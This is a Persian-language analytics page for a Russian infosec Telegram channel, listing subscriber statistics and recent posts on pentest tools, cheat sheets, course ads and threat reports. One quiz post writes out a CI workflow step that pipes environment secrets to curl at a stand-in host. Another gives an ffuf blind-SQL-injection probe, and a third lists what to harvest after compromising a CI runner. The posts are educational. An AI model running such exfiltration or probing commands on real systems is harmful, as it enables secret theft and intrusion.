اکنون در دسترس! پژوهش تلگرام ۲۰۲۵ — مهمترین بینشهای سال 
Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность
رفتن به کانال در Telegram
Все самое полезное по инфобезу в одном канале. Список наших каналов: https://t.me/proglibrary/9197 Для обратной связи: @proglibrary_feeedback_bot По рекламе: @proglib_adv РКН: https://gosuslugi.ru/snet/67ab0e2e75b36e054ef6d5bf
نمایش بیشتر📈 تحلیل کانال تلگرام Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность
کانال Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность (@hackproglib) در بخش زبانی روسی بازیگری فعال است. در حال حاضر جامعه شامل 12 824 مشترک است و جایگاه 9 916 را در دسته فناوری و برنامهها و رتبه 51 773 را در منطقه روسيا دارد.
📊 شاخصهای مخاطب و پویایی
از زمان ایجاد در невідомо، پروژه رشد سریعی داشته و 12 824 مشترک جذب کرده است.
بر اساس آخرین دادهها در تاریخ 03 ژوئن, 2026، کانال فعالیت پایداری دارد. در ۳۰ روز گذشته تغییر اعضا برابر 7 و در ۲۴ ساعت گذشته برابر 3 بوده و همچنان دسترسی گستردهای حفظ شده است.
- وضعیت تأیید: تأیید نشده
- نرخ تعامل (ER): میانگین تعامل مخاطب 6.19% است و در ۲۴ ساعت نخست پس از انتشار، محتوا معمولاً 3.73% واکنش نسبت به کل مشترکان کسب میکند.
- دسترسی پستها: هر پست به طور میانگین 794 بازدید دریافت میکند. در اولین روز معمولاً 479 بازدید جمعآوری میشود.
- واکنشها و تعامل: مخاطبان بهطور فعال حمایت میکنند؛ میانگین واکنش به هر پست 7 است.
- علایق موضوعی: محتوا بر موضوعات کلیدی مانند хакер, навигация, htb, linux, шпаргалка تمرکز دارد.
📝 توضیح و سیاست محتوایی
نویسنده این فضا را محل بیان دیدگاههای شخصی توصیف میکند:
“Все самое полезное по инфобезу в одном канале.
Список наших каналов: https://t.me/proglibrary/9197
Для обратной связи: @proglibrary_feeedback_bot
По рекламе: @proglib_adv
РКН: https://gosuslugi.ru/snet/67ab0e2e75b36e054ef6d5bf”
به لطف بهروزرسانیهای پرتکرار (آخرین داده در تاریخ 04 ژوئن, 2026)، کانال همواره بهروز و دارای دسترسی بالاست. تحلیلها نشان میدهد مخاطبان بهطور فعال با محتوا تعامل دارند و آن را به نقطه اثرگذاری مهم در دسته فناوری و برنامهها تبدیل کردهاند.
12 824
مشترکین
+324 ساعت
-57 روز
+730 روز
در حال بارگیری داده...
کانالهای مشابه
ابر برچسبها
اشارات ورودی و خروجی
---
---
---
---
---
---
جذب مشترکین
ژوئن '26
ژوئن '26
+13
در 1 کانالها
مه '26
+116
در 2 کانالها
Get PRO
آوریل '26
+109
در 1 کانالها
Get PRO
مارس '26
+307
در 4 کانالها
Get PRO
فوریه '26
+254
در 6 کانالها
Get PRO
ژانویه '26
+116
در 2 کانالها
Get PRO
دسامبر '25
+102
در 2 کانالها
Get PRO
نوامبر '25
+170
در 2 کانالها
Get PRO
اکتبر '25
+133
در 4 کانالها
Get PRO
سپتامبر '25
+120
در 0 کانالها
Get PRO
اوت '25
+170
در 4 کانالها
Get PRO
ژوئیه '25
+129
در 1 کانالها
Get PRO
ژوئن '25
+180
در 2 کانالها
Get PRO
مه '25
+161
در 1 کانالها
Get PRO
آوریل '25
+152
در 1 کانالها
Get PRO
مارس '25
+256
در 53 کانالها
Get PRO
فوریه '25
+209
در 32 کانالها
Get PRO
ژانویه '25
+195
در 35 کانالها
Get PRO
دسامبر '24
+216
در 40 کانالها
Get PRO
نوامبر '24
+207
در 41 کانالها
Get PRO
اکتبر '24
+277
در 38 کانالها
Get PRO
سپتامبر '24
+212
در 38 کانالها
Get PRO
اوت '24
+242
در 37 کانالها
Get PRO
ژوئیه '24
+261
در 37 کانالها
Get PRO
ژوئن '24
+201
در 32 کانالها
Get PRO
مه '24
+277
در 39 کانالها
Get PRO
آوریل '24
+327
در 37 کانالها
Get PRO
مارس '24
+246
در 32 کانالها
Get PRO
فوریه '24
+286
در 31 کانالها
Get PRO
ژانویه '24
+302
در 27 کانالها
Get PRO
دسامبر '23
+308
در 25 کانالها
Get PRO
نوامبر '23
+253
در 5 کانالها
Get PRO
اکتبر '23
+1 115
در 23 کانالها
Get PRO
سپتامبر '23
+562
در 0 کانالها
Get PRO
اوت '23
+510
در 0 کانالها
Get PRO
ژوئیه '23
+339
در 0 کانالها
Get PRO
ژوئن '23
+194
در 0 کانالها
Get PRO
مه '23
+400
در 0 کانالها
Get PRO
آوریل '23
+181
در 0 کانالها
Get PRO
مارس '23
+437
در 0 کانالها
Get PRO
فوریه '23
+310
در 0 کانالها
Get PRO
ژانویه '23
+245
در 0 کانالها
Get PRO
دسامبر '22
+340
در 0 کانالها
Get PRO
نوامبر '22
+413
در 0 کانالها
Get PRO
اکتبر '22
+253
در 0 کانالها
Get PRO
سپتامبر '22
+276
در 0 کانالها
Get PRO
اوت '22
+256
در 0 کانالها
Get PRO
ژوئیه '22
+361
در 0 کانالها
Get PRO
ژوئن '22
+408
در 0 کانالها
Get PRO
مه '22
+221
در 0 کانالها
Get PRO
آوریل '22
+156
در 0 کانالها
Get PRO
مارس '22
+369
در 0 کانالها
Get PRO
فوریه '22
+136
در 0 کانالها
Get PRO
ژانویه '22
+265
در 0 کانالها
Get PRO
دسامبر '21
+258
در 0 کانالها
Get PRO
نوامبر '21
+349
در 0 کانالها
Get PRO
اکتبر '21
+315
در 0 کانالها
Get PRO
سپتامبر '21
+315
در 0 کانالها
Get PRO
اوت '21
+295
در 0 کانالها
Get PRO
ژوئیه '21
+351
در 0 کانالها
Get PRO
ژوئن '21
+399
در 0 کانالها
Get PRO
مه '21
+589
در 0 کانالها
Get PRO
آوریل '21
+574
در 0 کانالها
Get PRO
مارس '21
+400
در 0 کانالها
Get PRO
فوریه '21
+433
در 0 کانالها
Get PRO
ژانویه '21
+338
در 0 کانالها
Get PRO
دسامبر '20
+2 141
در 0 کانالها
| تاریخ | رشد مشترکین | اشارات | کانالها | |
| 04 ژوئن | +1 | |||
| 03 ژوئن | +5 | |||
| 02 ژوئن | +5 | |||
| 01 ژوئن | +2 |
پستهای کانال
Repost from Азбука айтишника
🐧 Шпаргалка по работе с утилитой cron и правам для файлов в Linux: на заметку этичному хакеру
🔹 Курс «Алгоритмы и структуры данных»
🔹 Получить консультацию менеджера
🔹 Сайт Академии 🔹 Сайт Proglib
🏃♀️ Азбука айтишника
#магиякода
| 2 |  💡 Крупнейший каталог OSINT-инструментов
В каталоге собрано более 1300 инструментов, разбитых на десятки категорий:
— Telegram
— Социальные сети
— Email и Username Search
— Геолокация
— Анализ доменов и IP
— Утечки данных
— Metadata Analysis
— Threat Intelligence
➡️ Что удобно:
— поиск по инструментам;
— автоматическое обновление из GitHub;
— более 50 категорий;
— веб-версия, Android и desktop-клиент.
Полезная закладка для OSINT-специалистов, расследователей, багхантеров и пентестеров.
🔗 Ссылка
📍 Навигация: [Вакансии]
🐸 Библиотека хакера
#resource_drop | 389 |
| 3 | 🧩 Хакер-челлендж
Сценарий: в open source-репозиторий прилетает pull request с “безобидным” изменением GitHub Actions workflow.
Внутри добавили шаг:
- name: Debug publish run: | env | base64 | curl -s -X POST https://example[.]com/logs -d @-
Автор PR пишет:
«Оптимизировал publish pipeline и добавил debug output для диагностики релизов».
❓ Что здесь нужно проверять в первую очередь? Голосуйте эмодзи:
🔥 — Exfiltration of CI/CD secrets: workflow пытается вывести переменные окружения и секреты наружу.
👾 — Dependency confusion: пакет подтягивается из внешнего registry.
❤️ — Cache poisoning: атакующий подменяет build cache.
👍 — Path traversal: workflow читает файлы за пределами проекта.
📍 Навигация: [Вакансии]
🐸 Библиотека хакера
#ctf_challenge | 550 |
| 4 | ⚡️ Продолжаем знакомить вас с экспертами курса AgentOps!
— Сергей Нотевский расскажет, как выстроить FinOps для AI-продуктов: оптимизировать затраты на разработку и продакшен, внедрить model routing, semantic cache и систему алертов для контроля расходов
— Эмиль Сатаев разберет Context Engineering: управление контекстом, защиту от prompt injection, работу с длинными контекстами и построение безопасного пайплайна входа для AI-систем
— Михаил Бондаревский покажет, как подготовить инфраструктуру для AI-агентов: Docker, sandboxing, streaming, docker-compose и воспроизводимое окружение для разработки и продакшена
— Мурат Хажгериев расскажет про Enterprise Integrations & MCP: когда MCP действительно нужен, как подключать внешние сервисы и реализовывать интеграции с OAuth2 delegation
— Герман Сабиров разберет Governance & Compliance для AI-систем: data flow, audit logs, требования 152-ФЗ, локализацию данных и построение compliance-подхода на уровне архитектуры
Курс для backend-разработчиков, тимлидов и LLM инженеров о том, как внедрять AI-логику в бэкенд IT-продуктов и сохранять стабильность сервиса.
👉 Изучить обновленную программу AgentOps и занять место. | 548 |
| 5 |  💻 Практика атак на Kubernetes
Kubernetes Goat — это специально уязвимый Kubernetes-кластер для обучения безопасности на практике.
➡️ Что внутри:
— ошибки RBAC и лишние привилегии
— уязвимые контейнеры
— небезопасные настройки кластера
— privilege escalation
— container escape
— практические сценарии для Red Team и Blue Team
Отличная площадка для изучения атак на Kubernetes в безопасной среде ✅
🔗 Ссылка на GitHub
📍 Навигация: [Вакансии]
🐸 Библиотека хакера
#tool_of_the_week | 613 |
| 6 | Подрядчик подключился к вашей системе. Работу сделал. Доступ остался.
Знакомая ситуация?
В какой-то момент становится сложно ответить на простой вопрос, кто сейчас вообще подключен к вашим ИТ-ресурсам и что там делает.
Именно в таких сценариях чаще всего начинаются проблемы. Доступы выдаются быстро, а потом про них забывают. Контроль снижается, а одной ошибки или компрометации бывает достаточно, чтобы затронуть важные для компании системы.
В канале Индид вы найдете материалы о том, как выстраивать защиту учетных данных, снижать риски инцидентов и всегда держать доступ к инфраструктуре под контролем.
В нем вы сможете забрать гайд по работе с подрядчиками. Внутри:
📍 Ключевые риски ИБ при работе с подрядчиками
📍 Способы атак злоумышленников и их последствия
📍 Меры безопасности, регламентирующие получение прав доступа
Подписывайтесь на канал Индид, чтобы регулярно читать практические материалы о защите доступа.
#реклама
О рекламодателе | 560 |
| 7 | Они прогрессируют, уже пытаются маскироваться под людей
🔹 Курс разработка AI-агентов
🔹 Получить консультацию менеджера
🔹 Сайт Академии 🔹 Сайт Proglib
🏃♀️ Азбука айтишника
#небагафича | 594 |
| 8 | ⚡️ Blind SQLi через время ответа в ffuf
При поиске Blind SQL Injection не всегда есть ошибки в ответе приложения. Иногда единственный признак — увеличение времени ответа.
Команда для поиска параметров с задержкой:
-w /usr/share/seclists/Fuzzing/SQLi/Generic-SQLi.txt \
-fc 404 \
-mt 5000
🈂️ -mt 5000 — покажет только ответы дольше 5 секунд
🈂️ Задержка может указывать на time-based Blind SQLi
🈂️ Удобно для первичного скрининга параметров без ручной проверки
⚠️ Не забывайте исключать ложные срабатывания из-за медленных API, rate limiting и сетевых задержек.
📍 Навигация: [Вакансии]
🐸 Библиотека хакера
#cheat_sheet | 626 |
| 9 | 🛣 Penetration Testing Roadmap — коллекция ресурсов, сертификатов, инструментов и методологий, которые помогут вам стать экспертом в области пентеста.
👉 GitHub & Сайт
🔹 Курс «Алгоритмы и структуры данных»
🔹 Получить консультацию менеджера
🔹 Сайт Академии 🔹 Сайт Proglib
🏃♀️ Азбука айтишника
#магиякода | 671 |
| 10 |  🔥 Автоматизация пентеста через AI-агентов
Pentest Swarm AI агенты обмениваются находками между собой и самостоятельно выбирают следующие шаги атаки на основе уже собранных данных.
Что умеет:
🔘 Поиск поддоменов
🔘 Сканирование портов
🔘 Поиск уязвимостей
🔘 Эксплуатация находок
🔘 Генерация отчётов
Есть готовые сценарии для Bug Bounty, CTF и анализа внешней поверхности атаки.
🔗 GitHub
📍 Навигация: [Вакансии]
🐸 Библиотека хакера
#tool_of_the_week | 676 |
| 11 | ⚡️ Последний шанс забрать курсы со СКИДКОЙ 40%! Прокачайте свой мозг правильно
До конца акции вы можете воспользоваться специальными ценами на самые востребованные IT-направления. Круто и выгодно прокачать свои скиллы, чтобы получить оффер, уехать на Бали и больше не быть онлайн 😎
➡️ Разработка AI-агентов — от 49 000 ₽ (вместо 69 000 ₽)
Курс про контролируемую разработку ИИ-агентов: качество, стоимость, наблюдаемость и тестирование. С первого занятия — только практическая работа.
➡️ Курс AgentOps — 129 000 ₽ (вместо 149 000 ₽)
Профессиональный трек для разработчиков и LLM инженеров о том, как правильно внедрять AI-логику в бэкенд и сохранять железную стабильность сервиса.
➡️ Математика для Data Science — от 29 990 ₽ (вместо 39 990 ₽)
Вы научитесь решать сложные математические задачи, которые дают на собеседованиях на позицию дата-сайентиста в бигтехе. Отличная база для мощного старта в DS.
➡️ Курс Специалист по ИИ — 89 000 ₽ (вместо 113 900 ₽)
Комплексная программа для получения профессии в сфере ИИ с нуля. За 8 месяцев вы соберете сильное портфолио из 5 реальных проектов и дипломной работы.
➡️ Архитектуры и шаблоны проектирования — 27 990 ₽ (вместо 37 900 ₽)
Интенсив для разработчиков, который поможет освоить основные паттерны проектирования и прокачать навыки архитектора программного обеспечения.
🌸 Выбирайте направление, оставляйте заявку на сайте распродажи, и наш менеджер подробно вас проконсультирует | 603 |
| 12 | 🔑 Топ-4 механизма аутентификации
Эти архитектуры уберегут вас от фатальных дыр в безопасности при настройке серверов, интеграции сторонних сервисов или проектировании баз данных.
🛡 Главные инструменты проверки:
1. Ключи SSH: Криптографическая пара из публичного и приватного ключей. Публичный лежит на сервере, приватный — у вас. Идеально подходит для безопасного беспарольного доступа к серверам и Git-репозиториям.
2. Токены OAuth: Временные цифровые пропуска, которые выдает сервер авторизации. Нужны для того, чтобы сторонние приложения могли получить ограниченный доступ к вашим данным (например, «войти через Google»), вообще не зная вашего реального пароля.
3. Сертификаты SSL: Цифровые паспорта для сайтов. Они подтверждают, что сервер принадлежит именно тому домену, на который вы зашли, и обеспечивают безопасное зашифрованное HTTPS-соединение.
4. Учетные данные: Классическая связка «логин + пароль». Данные пользователя отправляются по защищенному каналу на сервер, где пароль хэшируется и сверяется с базой данных. Самый старый, понятный, но и самый уязвимый из-за человеческого фактора метод.
🔹 Практический интенсив «Архитектуры и шаблоны проектирования»
🔹 Получить консультацию менеджера
🔹 Сайт Академии 🔹 Сайт Proglib
🏃♀️ Азбука айтишника
#ликбез | 551 |
| 13 |  📌 580+ команд для пентестера
Внутри собраны команды по основным направлениям:
— Recon & Enumeration
— Active Directory
— Web Security
— Privilege Escalation
— Pivoting & Tunneling
— Post Exploitation
— Linux и Windows
Все команды разбиты по категориям и доступны через удобный интерфейс в стиле терминала ⚡️
🔵 Подойдёт для:
— OSCP / OSEP подготовки;
— CTF;
— лабораторий;
— внутренних пентестов;
— быстрого поиска команд во время работы.
📎 Ссылка
📍 Навигация: [Вакансии]
🐸 Библиотека хакера
#cheat_sheet | 556 |
| 14 | 🦾🧠🏋️ Качаем мозги к лету!
Все готовятся к пляжному сезону, а мы предлагаем прокачать хард-скилы, чтобы забрать крутой оффер, строить продукты будущего и работать из любой точки мира 😎
⚡️ Распродажа @proglib_academy: забирайте самые актуальные образовательные треки по сниженным ценам!
➡️ Разработка AI-агентов — от 49 000 ₽ (вместо 69 000 ₽).
➡️ Курс AgentOps — 129 000 ₽ (вместо 149 000 ₽).
➡️ Математика для разработки AI-моделей — 23 990 ₽ (вместо 31 990 ₽).
➡️ ML для старта в Data Science — 28 990 ₽ (вместо 38 990 ₽).
Почему мы?
⭐️Учим для продакшена. Наши программы заточены под реальные задачи бизнеса: как не слить бюджет на токены, как заставить LLM работать стабильно в бэкенде и как выстроить отказоустойчивую архитектуру.
⭐️Спикеры — суровые практики. Вы будете перенимать опыт у действующих AI-архитекторов, тимлидов и ML-инженеров из топовых IT-компаний.
⭐️Комплексный подход. Мы даем как мощный математический фундамент для понимания моделей «под капотом», так и передовые инструменты оркестрации агентов.
⭐️Много практики и фидбека. Вебинары, десятки практических заданий и живое общение с экспертами в чате Telegram на протяжении всего обучения.
⏳ Оставляйте заявку и бронируйте место со СКИДКОЙ 40% | 548 |
| 15 |  📌 Подборка статей по теме Supply Chain атак через инструменты разработчика
Собрали топовые материалы: от разбора конкретных инцидентов до техник защиты.
➖ Отравленное расширение VS Code привело к взлому GitHub, и Microsoft владеет каждым звеном этой цепи — полная анатомия атаки: как троянизированный Nx Console (2.2M установок) за 18 минут привёл к краже 3 800 внутренних репозиториев GitHub. Лучший разбор инцидента.
➖ Технический deep dive в пейлоад Nx Console — StepSecurity — multi-stage credential stealer: сбор токенов из GitHub/npm/AWS/Vault/K8s/1Password, DNS-туннелирование, persistence через GitHub Search API как dead-drop, поддельная Sigstore-аттестация для публикации «легитимных» пакетов.
➖ Ликвидация инфраструктуры GlassWorm: разрушение supply chain атак на VS Code, npm, Python и GitHub — как CrowdStrike, Google и Shadowserver 26 мая одновременно уничтожили все C2-каналы ботнета. 35 000+ заражённых установок, 300+ отравленных репозиториев с начала 2025.
➖ Вредоносный npm-пакет крадёт файлы из рабочей директории Claude AI — пакет mouse5212-super-formatter, написанный с помощью ИИ, таргетит /mnt/user-data. Автор слил свой же GitHub-токен в код.
➖ Как закрепить версии расширений VS Code для защиты от supply chain атак — практический гайд: pinning версий в devcontainers, отключение автообновления, проверка publisher identity.
➖ Утечка исходного кода GitHub: причиной стало вредоносное расширение для VS Code — подробный русскоязычный разбор: механика червя Mini Shai-Hulud, инфраструктура C2 через «мёртвые» репозитории, демон kitty-monitor, аварийный переключатель по ключевому слову «firedalazer».
➖ Вы пустили ИИ-агента в репозиторий — теперь разбираемся, что он может сломать — кража SSH-ключей через Claude Code, эксфильтрация через DNS-запросы в обход allowlist, компрометация CI/CD → cloud admin за 72 часа через OIDC.
➖ Черви в расширениях VS Code: новая угроза для разработчиков — как вредоносные расширения используют децентрализованные C2, обфускацию и легитимные репозитории.
📍 Навигация: [Вакансии]
🐸 Библиотека хакера
#resource_drop | 623 |
| 16 |  🐸 Библиотека хакера
#hack_humor | 694 |
| 17 | Если вы думаете, что ваш провайдер медленный, вспомните парней из Норвегии. В 2001 году группа пользователей Linux из Бергена решила на практике проверить шуточный протокол IP over Avian Carriers (RFC 1149).
Результаты легендарного эксперимента:
- Дистанция: 5 км.
- Пакеты: 9 ICMP-запросов (пингов), привязанных к лапкам голубей.
- Потери: До финиша добрались только 4 ответа. Пакет лосс составил солидные 55,6%.
- Задержка: От 53 минут до 1 часа 40 минут.
А какой был ваш самый «медленный» опыт работы с сетью?
❤️ — 56 кбит/с
🔥 — Спутник в глуши
🙏 — Раздача с телефона в подвале (одна палочка EDGE и бесконечное ожидание)
🔹 Курс разработка AI-агентов
🔹 Получить консультацию менеджера
🔹 Сайт Академии 🔹 Сайт Proglib
🏃♀️ Азбука айтишника
#режимразраба | 670 |
| 18 | 🔥 Вопрос с собеседования
Как можно развить атаку после доступа к CI/CD runner?
👇Правильный ответ:
Runner — это не просто машина для сборки. Часто он имеет доступ к секретам, registry, облакам и внутренней сети.
Что проверять дальше:
— переменные окружения и CI/CD secrets;
— токены GitHub / GitLab / cloud-провайдеров;
— доступ к Docker socket или Kubernetes config;
— какие internal-сервисы видит runner;
— можно ли подменить артефакты сборки;
— есть ли доступ к container registry;
— куда pipeline может деплоить код.
⚡️ Сильный ответ:
«После доступа к runner я оцениваю blast radius: какие секреты доступны, куда можно двигаться дальше и можно ли повлиять на supply chain.»
📍 Навигация: [Вакансии]
👍 — хороший вопрос
🔥 — забрал в копилку
🐸 Библиотека хакера
#ctf_challenge | 732 |
| 19 | ⌨️ DLL Side-Loading — любимый приём APT
Подписанный .exe выглядит безопасно, антивирус видит известный процесс, а вредоносный код quietly запускается через подложенную библиотеку.
🔜 После кейса MuddyWater собрали короткую шпаргалку по DLL Side-Loading:
— как работает техника;
— почему её сложно замечать;
— что искать в логах;
— как детектить через Sysmon и PowerShell.
Сохраняйте в избранное ⚡️
📍 Навигация: [Вакансии]
🐸 Библиотека хакера
#cheat_sheet | 755 |
| 20 |  🇮🇷 MuddyWater превращает доверенные EXE в загрузчики малвари
Symantec и Carbon Black раскрыли новую кампанию MuddyWater (Seedworm / Static Kitten), связанной с Министерством разведки Ирана.
🔜 Под удар попали 9 организаций на 4 континентах:
аэропорт, финансовый сектор, промышленность, образование и крупный производитель электроники
Главная техника — DLL Side-Loading через доверенные бинарники:
🔴 fmapp.exe → загружает вредоносную fmapp.dll
🔴 sentinelmemoryscanner.exe → грузит sentinelagentcore.dll
😳 После закрепления внутри сети использовались:
— Node.js runtime для PowerShell;
— dump SAM и повышение привилегий;
— SOCKS5 reverse proxy;
— эксфильтрация через sendit.sh.
📍 Навигация: [Вакансии]
🐸 Библиотека хакера
#breach_breakdown | 803 |
